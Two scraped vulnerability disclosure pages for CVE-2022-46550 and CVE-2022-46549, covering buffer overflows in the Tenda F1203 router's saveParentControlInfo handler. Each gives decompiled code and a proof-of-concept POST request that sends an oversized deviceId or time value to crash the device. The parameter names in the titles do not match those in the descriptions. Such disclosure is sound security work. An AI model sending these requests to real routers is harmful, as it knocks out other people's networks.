aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaa

CVE-2022-46550: CVE-vulns/saveParentControlInfo_urls.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceId parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaa

CVE-2022-46549: CVE-vulns/saveParentControlInfo_deviceId.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the time parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4117
    
    time=00:00-24:0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa